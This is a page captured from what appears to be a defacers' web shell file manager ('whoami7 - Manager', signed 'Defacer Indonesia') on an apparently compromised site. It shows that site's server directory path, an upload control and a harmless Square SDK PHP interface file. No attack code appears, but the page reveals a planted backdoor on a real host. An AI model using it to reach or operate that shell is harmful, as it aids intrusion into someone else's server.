whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
vendor
/
square
/
square
/
src
/
Upload File:
files >> /home/kckglobal/www/portal/vendor/square/square/src/AuthManagerInterface.php
<?php declare(strict_types=1); namespace Square; use Square\Http\HttpRequest; /** * Interface for defining the behavior of Authentication Classes. */ interface AuthManagerInterface { /** * Adds authentication to the given HttpRequest. */ public function apply(HttpRequest $httpRequest); }
Copyright ©2021 || Defacer Indonesia